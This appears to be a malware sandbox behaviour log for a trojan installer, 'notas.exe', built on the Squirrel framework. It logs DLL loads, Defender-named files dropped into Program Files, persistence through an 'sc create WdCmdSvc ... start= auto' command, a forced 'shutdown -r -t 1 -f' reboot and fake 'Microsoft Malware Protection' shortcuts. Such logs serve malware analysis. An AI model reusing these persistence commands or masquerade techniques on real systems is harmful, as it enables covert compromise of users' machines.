          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: linkinfo.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: ntshrui.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: cscapi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: edputil.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: windows.staterepositoryps.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: appresolver.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: bcp47langs.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: slc.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: wtsapi32.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: winsta.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: umpdc.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: dwmapi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: d3d9.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: d3d10warp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: textshaping.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: dataexchange.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: d3d11.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: dcomp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: dxgi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: twinapi.appcore.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: textinputframework.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: coreuicomponents.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: coremessaging.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: coremessaging.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: msctfui.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: uiautomationcore.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: resourcepolicyclient.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: dxcore.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: sxs.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: explorerframe.dllJump to behavior
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeSection loaded: mpsvc.dllJump to behavior
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeSection loaded: netapi32.dllJump to behavior
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeSection loaded: textshaping.dllJump to behavior
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeSection loaded: dwmapi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeSection loaded: edputil.dllJump to behavior
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeSection loaded: windows.staterepositoryps.dllJump to behavior
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeSection loaded: appresolver.dllJump to behavior
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeSection loaded: bcp47langs.dllJump to behavior
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeSection loaded: slc.dllJump to behavior
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeSection loaded: pcacli.dllJump to behavior
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeSection loaded: sfc_os.dllJump to behavior
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeSection loaded: mpsvc.dllJump to behavior
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeSection loaded: netapi32.dllJump to behavior
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeSection loaded: textshaping.dllJump to behavior
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeSection loaded: dwmapi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeSection loaded: edputil.dllJump to behavior
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeSection loaded: windows.staterepositoryps.dllJump to behavior
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeSection loaded: appresolver.dllJump to behavior
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeSection loaded: bcp47langs.dllJump to behavior
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeSection loaded: slc.dllJump to behavior
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
          Source: C:\Windows\SysWOW64\shutdown.exeSection loaded: shutdownext.dllJump to behavior
          Source: C:\Windows\SysWOW64\shutdown.exeSection loaded: sspicli.dllJump to behavior
          Source: 0219830219301290321012notas.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: 0219830219301290321012notas.exeStatic PE information: Section: .rsrc ZLIB complexity 0.9935229745216583
          Source: MpCmdRun.exe0.7.drBinary string: kernelbase.dllRaiseFailFastException%wswilstd::exception: %hsonecore\internal\sdk\inc\wil\opensource\wil\resource.h_p0WilError_03Bad optional accessamcore\antimalware\source\service\tools\mpcmdtool\mpperformancereport.cppProcessIdReasonPID\\?\\Device\\drivers\\FI_UNKNOWNerror: invalid data: System path changed during the trace from "%ls" to "%ls"
          Source: classification engineClassification label: mal76.rans.troj.evad.winEXE@15/77@1/1
          Source: C:\Users\user\Desktop\0219830219301290321012notas.exeCode function: 0_2_00221050 FindResourceW,LoadResource,0_2_00221050
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeFile created: C:\Program Files (x86)\Microsoft.NET\baseJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeFile created: C:\Users\user\AppData\Local\ContentPackJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeMutant created: NULL
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2764:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3620:120:WilError_03
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeFile created: C:\Users\user\AppData\Local\Temp\.squirrel-lock-68A44D3AD842D31101CEB3665791DCFE494869E5Jump to behavior
          Source: C:\Users\user\Desktop\0219830219301290321012notas.exeCommand line argument: kernel32.dll0_2_00227326
          Source: C:\Users\user\Desktop\0219830219301290321012notas.exeCommand line argument: --checkInstall0_2_00227326
          Source: 0219830219301290321012notas.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\0219830219301290321012notas.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: 0219830219301290321012notas.exeReversingLabs: Detection: 15%
          Source: 0219830219301290321012notas.exeVirustotal: Detection: 16%
          Source: 0219830219301290321012notas.exeString found in binary or memory: "%s" --install . %s
          Source: 0219830219301290321012notas.exeString found in binary or memory: DeploymentTool.exe\need dictionaryinvalid literal/length codeinvalid distance codeinvalid block typeinvalid stored block lengthstoo many length or distance symbolsinvalid bit length repeatoversubscribed dynamic bit lengths treeincomplete dynamic bit lengths treeoversubscribed literal/length treeincomplete literal/length treeoversubscribed distance treeincomplete distance treeempty distance tree with lengthsunknown compression methodinvalid window sizeincorrect header checkincorrect data check\..\\..//..//..\UT%s%s%s%s%sOpen Setup LogCloseInstallation has failedSquirrelSQUIRREL_TEMP%s%s\%sUnable to write to %s - IT policies may be restricting access to this folder\SquirrelTemp%s\SquirrelSetup.logDATAUpdate.exe"%s" --install . %sThere was an error while installing the application. Check the setup log for more information and contact the author.Failed to extract installervector<T> too longi
          Source: Update.exeString found in binary or memory: b=|baseUrl={Provides a base URL to prefix the RELEASES file packages with-a=|process-start-args=iArguments that will be used when starting executable-l=|shortcut-locations=
          Source: Update.exeString found in binary or memory: ((?=^[ ]{{0,{0}}}[^ \t\n])|\Z) # Lookahead for non-space at line-start, or end of doc
          Source: Update.exeString found in binary or memory: onError%Downloading file: 1Failed downloading URL: #Downloading url: 1Failed to download url: !squirrel-install3Starting automatic update7Failed to check for updates5Failed to download updates/Failed to apply updates9Failed to set up uninstaller){0} {1}{2} {3} # {4}
          Source: Update.exeString found in binary or memory: Scanning {0}mIgnoring {0} as the target framework is not compatible%Writing {0} to {1}UCouldn't find file for package in {1}: {0}%--squirrel-install%--squirrel-updated'--squirrel-obsolete)--squirrel-uninstall'--squirrel-firstrunAFailed to handle Squirrel events[\StringFileInfo\040904B0\SquirrelAwareVersion)SquirrelAwareVersion;Failed to promote Tray icon:
          Source: Update.exeString found in binary or memory: ..\Update.exegUpdate.exe not found, not a Squirrel-installed app?
          Source: Update.exeString found in binary or memory: update.MNo release to install, running the appIFailed to install package to app dirIFailed to update local releases file;Failed to invoke post-install;Starting fixPinnedExecutables)Fixing up tray icons
          Source: Update.exeString found in binary or memory: -delta.nupkg$iCannot apply combinations of delta and full packagesQCouldn't run Squirrel hook, continuing: ---squirrel-updated {0}---squirrel-install {0}9Squirrel Enabled Apps: [{0}]wNo apps are marked as Squirrel-aware! Going to run them all-Failed to delete key: /--squirrel-obsolete {0}7Couldn't delete directory: QCoudln't run Squirrel hook, continuing: WcleanDeadVersions: checking for version {0}kcleanDeadVersions: exclude current version folder {0}ccleanDeadVersions: exclude new version folder {0}
          Source: unknownProcess created: C:\Users\user\Desktop\0219830219301290321012notas.exe C:\Users\user\Desktop\0219830219301290321012notas.exe
          Source: unknownProcess created: C:\Users\user\Desktop\0219830219301290321012notas.exe "C:\Users\user\Desktop\0219830219301290321012notas.exe" --rerunningWithoutUAC
          Source: C:\Users\user\Desktop\0219830219301290321012notas.exeProcess created: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe "C:\Users\user\AppData\Local\SquirrelTemp\Update.exe" --install . --rerunningWithoutUAC
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess created: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe "C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe" --squirrel-firstrun
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeProcess created: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe "C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe"
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C sc create WdCmdSvc binPath= "C:\Program Files (x86)\Microsoft.NET\MpCmdRun.exe" start= auto
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc create WdCmdSvc binPath= "C:\Program Files (x86)\Microsoft.NET\MpCmdRun.exe" start= auto
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeProcess created: C:\Windows\SysWOW64\shutdown.exe C:\WINDOWS\system32\shutdown.exe -r -t 1 -f
          Source: C:\Windows\SysWOW64\shutdown.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\0219830219301290321012notas.exeProcess created: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe "C:\Users\user\AppData\Local\SquirrelTemp\Update.exe" --install . --rerunningWithoutUACJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess created: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe "C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe" --squirrel-firstrunJump to behavior
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C sc create WdCmdSvc binPath= "C:\Program Files (x86)\Microsoft.NET\MpCmdRun.exe" start= autoJump to behavior
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeProcess created: C:\Windows\SysWOW64\shutdown.exe C:\WINDOWS\system32\shutdown.exe -r -t 1 -fJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc create WdCmdSvc binPath= "C:\Program Files (x86)\Microsoft.NET\MpCmdRun.exe" start= autoJump to behavior
          Source: C:\Users\user\Desktop\0219830219301290321012notas.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00020424-0000-0000-C000-000000000046}\InprocServer32Jump to behavior
          Source: Microsoft Malware Protection.lnk.3.drLNK file: ..\..\..\..\..\..\Local\ContentPack\BumpFiles.exe
          Source: Microsoft Malware Protection.lnk0.3.drLNK file: ..\AppData\Local\ContentPack\BumpFiles.exe
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeWindow found: window name: TMainFormJump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeRegistry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ContentPackJump to behavior
          Source: 0219830219301290321012notas.exeStatic file information: File size 2102272 > 1048576
          Source: 0219830219301290321012notas.exeStatic PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x1d6600
          Source: 0219830219301290321012notas.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
          Source: 0219830219301290321012notas.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
          Source: 0219830219301290321012notas.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
          Source: 0219830219301290321012notas.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: 0219830219301290321012notas.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
          Source: 0219830219301290321012notas.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
          Source: 0219830219301290321012notas.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
          Source: 0219830219301290321012notas.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: D:\a\_work\1\s\\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: Update.exe, 00000003.00000002.2050601484.000000000328D000.00000004.00000800.00020000.00000000.sdmp, vcruntime140.dll.3.dr
          Source: Binary string: OfflineScannerShell.pdb source: OfflineScannerShell.exe.7.dr
          Source: Binary string: MpAzSubmit.pdb source: MpAzSubmit.dll.7.dr
          Source: Binary string: MpCmdRun.pdbGCTL source: MpCmdRun.exe0.7.dr
          Source: Binary string: netstandard.pdb.mdb source: Update.exe
          Source: Binary string: C:\Users\ani\code\squirrel\squirrel.windows\build\Release\Win32\StubExecutable.pdb source: Update.exe, 00000003.00000002.2050601484.0000000003267000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2050601484.0000000003245000.00000004.00000800.00020000.00000000.sdmp, BumpFiles.exe0.3.dr
          Source: Binary string: MpDetoursCopyAccelerator.pdb source: MpDetoursCopyAccelerator.dll.7.dr
          Source: Binary string: endpointdlp.pdb source: endpointdlp.dll.7.dr
          Source: Binary string: DefenderCSP.pdb source: DefenderCSP.dll.7.dr
          Source: Binary string: MpCmdRun.pdb source: MpCmdRun.exe0.7.dr
          Source: Binary string: endpointdlp.pdbGCTL source: endpointdlp.dll.7.dr
          Source: Binary string: shellext.pdb source: shellext.dll.7.dr
          Source: Binary string: MpDlpCmd.pdbGCTL source: MpDlpCmd.exe.7.dr
          Source: Binary string: C:\Users\ani\code\squirrel\squirrel.windows\build\Release\Win32\Setup.pdb source: 0219830219301290321012notas.exe
          Source: Binary string: MpAzSubmit.pdbGCTL source: MpAzSubmit.dll.7.dr
          Source: Binary string: ProtectionManagement.pdbGCTL source: ProtectionManagement.dll.7.dr
          Source: Binary string: MpCommu.pdb source: MpCommu.dll.7.dr
          Source: Binary string: MpDetoursCopyAccelerator.pdbGCTL source: MpDetoursCopyAccelerator.dll.7.dr
          Source: Binary string: MpCommu.pdbGCTL source: MpCommu.dll.7.dr
          Source: Binary string: shellext.pdbOGPS source: shellext.dll.7.dr
          Source: Binary string: ProtectionManagement.pdb source: ProtectionManagement.dll.7.dr
          Source: Binary string: MpDlpCmd.pdb source: MpDlpCmd.exe.7.dr
          Source: Binary string: MsMpEng.pdb source: Update.exe, 00000003.00000002.2050601484.00000000032B5000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2050601484.000000000323D000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2050601484.00000000031DD000.00000004.00000800.00020000.00000000.sdmp, BumpFiles.exe, BumpFiles.exe, 00000004.00000002.3857315150.0000000000C11000.00000020.00000001.01000000.00000008.sdmp, BumpFiles.exe, 00000007.00000000.2031196791.0000000000C11000.00000020.00000001.01000000.00000008.sdmp, MsMpEng.exe.7.dr
          Source: Binary string: MsMpEng.pdbGCTL source: MsMpEng.exe.7.dr
          Source: Binary string: OfflineScannerShell.pdbOGPS source: OfflineScannerShell.exe.7.dr
          Source: Binary string: DefenderCSP.pdbGCTL source: DefenderCSP.dll.7.dr
          Source: 0219830219301290321012notas.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
          Source: 0219830219301290321012notas.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
          Source: 0219830219301290321012notas.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
          Source: 0219830219301290321012notas.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
          Source: 0219830219301290321012notas.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
          Source: NisSrv.exe.7.drStatic PE information: 0xE6D47686 [Fri Sep 19 17:27:34 2092 UTC]
          Source: C:\Users\user\Desktop\0219830219301290321012notas.exeCode function: 0_2_00227326 SetDefaultDllDirectories,LoadLibraryW,GetProcAddress,CoInitialize,InitCommonControlsEx,GetModuleHandleW,GetModuleFileNameW,0_2_00227326
          Source: MpSvc.dll.3.drStatic PE information: section name: .didata
          Source: NisSrv.exe.7.drStatic PE information: section name: .didat
          Source: ProtectionManagement.dll.7.drStatic PE information: section name: .didat
          Source: MpCmdRun.exe.7.drStatic PE information: section name: .didat
          Source: MpCmdRun.exe0.7.drStatic PE information: section name: .didat
          Source: MpClient.dll.7.drStatic PE information: section name: _RDATA
          Source: MpCmdRun.dll.7.drStatic PE information: section name: .didata
          Source: MpCommu.dll.7.drStatic PE information: section name: .didat
          Source: MpRtp.dll.7.drStatic PE information: section name: .didat
          Source: MpSvc.dll.7.drStatic PE information: section name: .didat
          Source: C:\Users\user\Desktop\0219830219301290321012notas.exeCode function: 0_2_0022B056 push ecx; ret 0_2_0022B069
